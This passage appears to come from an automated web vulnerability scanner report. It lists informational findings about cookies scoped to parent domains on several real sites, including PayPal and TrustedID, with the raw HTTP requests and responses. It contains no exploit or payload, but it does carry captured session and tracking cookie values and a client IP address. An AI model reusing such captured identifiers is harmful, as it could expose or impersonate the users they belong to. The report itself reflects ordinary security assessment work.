The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/ HTTP/1.1
Host: www.krypt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.1.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:02 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:35:05 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 27890

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Contact
...[SNIP]...

17.160. http://www.krypt.com/solutions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /solutions/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /solutions/ HTTP/1.1
Host: www.krypt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.1.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:03 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:35:05 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 20343

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Solution
...[SNIP]...

17.161. http://www.krypt.com/why-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /why-us/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /why-us/ HTTP/1.1
Host: www.krypt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.1.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:04 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:35:05 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 22985

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - The Kryp
...[SNIP]...

17.162. http://www.krypt.com/why-us/datacenters/lax/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /why-us/datacenters/lax/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /why-us/datacenters/lax/ HTTP/1.1
Host: www.krypt.com
Proxy-Connection: keep-alive
Referer: http://krypt.com/dedicated/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.6.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:40:31 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:40:36 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 25090

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Datacent
...[SNIP]...

17.163. http://www.krypt.com/why-us/network/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /why-us/network/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /why-us/network/ HTTP/1.1
Host: www.krypt.com
Proxy-Connection: keep-alive
Referer: http://krypt.com/dedicated/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.6.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:41:08 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:41:15 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 24420

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Network
...[SNIP]...

17.164. http://www.lijit.com/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /beacon

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /beacon?viewId=1303693642942d8537072b8c9&rand=1303693644394&uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Finfusionsoft&informer=3811901&v=1.0&type=search HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljt_reader=089dpgpkPB0AADy6I-QAAAAL; ljt_ts=t=1303693631643046

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:40:12 GMT
Server: PWS/1.7.1.5
X-Px: ms iad-agg-n33 ( iad-agg-n19), ms iad-agg-n19 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, max-age=0
Pragma: no-cache
Expires: Mon, 25 Apr 2011 01:40:12 GMT
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Set-Cookie: tpro_inst=2b2cba2fe1372b0f599f451b1712306c; expires=Tue, 24-Apr-2012 01:40:15 GMT; path=/; domain=.lijit.com
Set-Cookie: tpro=eJxNkEGOwyAMRe%2FiNaqgBNJkOdeoRggR2iAlEEEy0ijK3cemSjs7v%2B%2BP%2Fc0OS06PMHnod3j6OPhM1WxJ4RfVMHj4kxp9MLDP6pVGXEnjgoFAaCugXdyMbAgkdqQyTVfhxkBxs0xbIby2OClbV0c5uzkSO%2FTYRzZ2PgfbEmw8YQxlOeu0jhSU4xQ3hmnIPtKkmMjQKga%2F%2FrVHoSNEl%2Ba6iRvJSRYao3GjK1xxreZG8Ddh%2BUna0Y40Tf51d0zx9RfNPxmxY%2FDMdjDFjTVke%2BC7ElbKcd9rBT18bSVEXwrgbSv0QnKpO6WFOr7fR%2BHvr4HyfroM5jQYl7ZIjxj8%2BFxCwpNBXDgcxx%2BNU33N; expires=Tue, 24-Apr-2012 01:40:15 GMT; path=/; domain=.lijit.com
Content-Length: 26

<html><body></body></html>

17.165. http://www.lijit.com/res/images/wijitTrack.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /res/images/wijitTrack.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /res/images/wijitTrack.gif?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Finfusionsoft&informer=3811901&viewId=1303693642942d8537072b8c9&rand=1303693642943&type=search&beacon=1 HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:39:35 GMT
Server: PWS/1.7.1.5
X-Px: ms iad-agg-n33 ( iad-agg-n35), ms iad-agg-n35 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Content-Length: 43
Content-Type: image/gif
Connection: keep-alive
Set-Cookie: ljt_reader=R6akywpkPEMAAHjGGMwAAAAf; expires=Thu, 30-Nov-2034 07:00:00 GMT; path=/; domain=.lijit.com
Set-Cookie: ljt_ts=t=1303695575131339; expires=Thu, 30-Nov-2034 07:00:00 GMT; path=/; domain=.lijit.com

GIF89a.............!.......,...........D..;

17.166. https://www.paypal.com/cgi-bin/webscr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paypal.com
Path:   /cgi-bin/webscr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/webscr HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:52:47 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=sT_I63NuUR8LcE-tuRsQ5JgX5j4FM6fbZrEXkeGREDWPCDpPdl4qfrs6ypGS8IgVxSjjxsRKnGeafhSyMq1ZS1PJW3n0n15HpMokWcZjOuxriDljpK5cu_5qm33nM3QcMOJp-0%7c0mUK39OzvMDBZKIY55RYJ6j_BtoDi5ockOySsmyAlvUwdtM-jxqcTWjhEO6-fDz0fbHX10%7cBr7I2M0muunKbPwJZggbyDS6A5tobB-8N0Tk4dp5P1igDVsWXpxDcsmgKFTN_I1XuL1u-G%7c1303663968; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=ly4prVVJG_b0nU4XMqMUklBtFWWgyHjwVp8kw7WCtMl1PTFxLmM-9ciCTN0y1zlmQwmDRdwh1nRQZrtB; expires=Sat, 19-Apr-2031 16:52:48 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: cookie_check=yes; expires=Wed, 21-Apr-2021 16:52:48 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; expires=Wed, 21-Apr-2021 16:52:48 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Sat, 19-Apr-2031 16:52:48 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: Apache=10.190.8.159.1303663967738130; path=/; expires=Tue, 16-Apr-41 16:52:47 GMT
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31254

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#">
<head>
<meta http-equiv="C
...[SNIP]...

17.167. http://www.securepaynet.net/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.securepaynet.net
Path:   /default.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet HTTP/1.1
Host: www.securepaynet.net
Proxy-Connection: keep-alive
Referer: http://kroogy.com/pub/banner_728_90_random.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=h05vhh55un4r0t3lzxjaq3m2; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc471557=US; domain=securepaynet.net; path=/
Set-Cookie: flag471557=cflag=us; domain=securepaynet.net; expires=Tue, 24-Apr-2012 12:42:00 GMT; path=/
Set-Cookie: currency471557=potableSourceStr=USD; domain=securepaynet.net; expires=Mon, 23-Apr-2012 12:42:00 GMT; path=/
Set-Cookie: currencypopin471557=cdisplaypopin=false; domain=securepaynet.net; expires=Tue, 24-Apr-2012 12:42:00 GMT; path=/
Set-Cookie: SplitValue471557=16; domain=securepaynet.net; expires=Mon, 25-Apr-2011 12:42:00 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=http://kroogy.com/pub/banner_728_90_random.php&sitename=www.securepaynet.net&page=/default.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=isc=kro_2011&ci=1767&prog_id=indextonet&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=16; domain=securepaynet.net; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 24 Apr 2011 12:42:01 GMT
Content-Length: 156097


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

17.168. http://www.securepaynet.net/external/json/SalesBanner.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.securepaynet.net
Path:   /external/json/SalesBanner.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /external/json/SalesBanner.aspx?layout=Sidebar&isc=kro_2011&targetDivId=ctl00_sidebarController_SidebarBanner_pnlSalesBanner&prog_id=indextonet&callback=jsonp1303648053058&_=1303648053496 HTTP/1.1
Host: www.securepaynet.net
Proxy-Connection: keep-alive
Referer: http://www.securepaynet.net/default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pbyt3z45y25hu0mc0j4lts45; adc471557=US; flag471557=cflag=us; currency471557=potableSourceStr=USD; currencypopin471557=cdisplaypopin=false; SplitValue471557=30; traffic=cookies=1&referrer=http://kroogy.com/pub/banner_728_90_random.php&sitename=www.securepaynet.net&page=/default.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=isc=kro_2011&ci=1767&prog_id=indextonet&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=30; __utmz=1.1303648053.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; __utma=1.1286408685.1303648053.1303648053.1303648053.1; __utmc=1; __utmb=1.1.10.1303648053; SiteWidth471557=1000; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=http://www.securepaynet.net/default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet&sitename=www.securepaynet.net&page=/external/json/SalesBanner.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=layout=Sidebar&isc=kro_2011&targetDivId=ctl00_sidebarController_SidebarBanner_pnlSalesBanner&prog_id=indextonet&callback=jsonp1303648053058&_=1303648053496&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=30; domain=securepaynet.net; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 24 Apr 2011 12:42:20 GMT
Content-Length: 124

jsonp1303648053058({"Html":"\r\n \r\n","TargetDivID":"ctl00_sidebarController_SidebarBanner_pnlSalesBanner","Data":null})

17.169. https://www.trustedid.com/cmalp1.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /cmalp1.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cmalp1.php?promoRefCode=SEMGOOGCM14DF&gclid=CLTp5ZX1tagCFUSo4Aod61iHCA HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: promoRefCode=NXTIDF01IDEFT

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:23:36 GMT
Server: Apache
Set-Cookie: TIDT=173.193.214.243.1303676616385263; path=/; domain=.trustedid.com
Set-Cookie: TSI=n9aijp6kmv2idr7asjh3a48343; path=/; domain=www.trustedid.com; secure; HttpOnly
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: promoRefCode=SEMGOOGCM14DF; expires=Tue, 24-May-2011 20:23:36 GMT; path=/; domain=.trustedid.com; secure
Set-Cookie: refCode=deleted; expires=Sat, 24-Apr-2010 20:23:35 GMT; path=/; domain=.trustedid.com; secure
Set-Cookie: TSI=tsis0amhjkv950im9ira5ikvg6; path=/; domain=www.trustedid.com; secure; HttpOnly
Set-Cookie: promoRefCode=SEMGOOGCM14DF; expires=Tue, 24-May-2011 20:23:36 GMT; path=/; domain=.trustedid.com; secure
Last-Modified: Sun, 24 Apr 2011 20:23:36 GMT
Cache-Control: post-check=0, pre-check=0
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 20733

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html >
<head>

<title>TrustedID - America's Identity Theft Protection Company - Identity Theft P
...[SNIP]...

17.170. https://www.trustedid.com/idfide01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /idfide01/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /idfide01/?promoCodeRefIde=NXTIDF01IDEFT&promoCodeRefIdf=NXTIDF01IDFFT15 HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:12:34 GMT
Server: Apache
Set-Cookie: TIDT=173.193.214.243.1303614754152763; path=/; domain=.trustedid.com
Set-Cookie: TSI=6rjj85kupb6n5r77pnlgtoq3g0; path=/; domain=www.trustedid.com; secure; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 10457

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Best-in-class Identity Protection</title>
<meta content="text/ht
...[SNIP]...

17.171. https://www.trustedid.com/registration.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /registration.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /registration.php?promoRefCode=NXTIDF01IDEFT HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
Referer: https://www.trustedid.com/idfide01/?promoCodeRefIde=NXTIDF01IDEFT&promoCodeRefIdf=NXTIDF01IDFFT15
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TIDT=173.193.214.243.1303614754152763; TSI=6rjj85kupb6n5r77pnlgtoq3g0; promoRefCode=NXDIRSUZIDPANN

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:50:27 GMT
Server: Apache
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: promoRefCode=NXTIDF01IDEFT; expires=Tue, 24-May-2011 03:50:27 GMT; path=/; domain=.trustedid.com; secure
Set-Cookie: refCode=deleted; expires=Sat, 24-Apr-2010 03:50:26 GMT; path=/; domain=.trustedid.com; secure
Set-Cookie: TSI=rad7gd7ho7s7nspvlonpj701d5; path=/; domain=www.trustedid.com; secure; HttpOnly
Set-Cookie: promoRefCode=NXTIDF01IDEFT; expires=Tue, 24-May-2011 03:50:27 GMT; path=/; domain=.trustedid.com; secure
Last-Modified: Sun, 24 Apr 2011 03:50:27 GMT
Cache-Control: post-check=0, pre-check=0
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 26670

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html >
<head>

<title>Identity Theft Protection Enrollment - TrustedID Registration</title>
<met
...[SNIP]...

17.172. https://www.trustedid.com/suzeidprotector/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /suzeidprotector/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /suzeidprotector/?promoRefCode=NXDIRSUZIDPANN HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:12:19 GMT
Server: Apache
Set-Cookie: TIDT=173.193.214.243.1303614739643665; path=/; domain=.trustedid.com
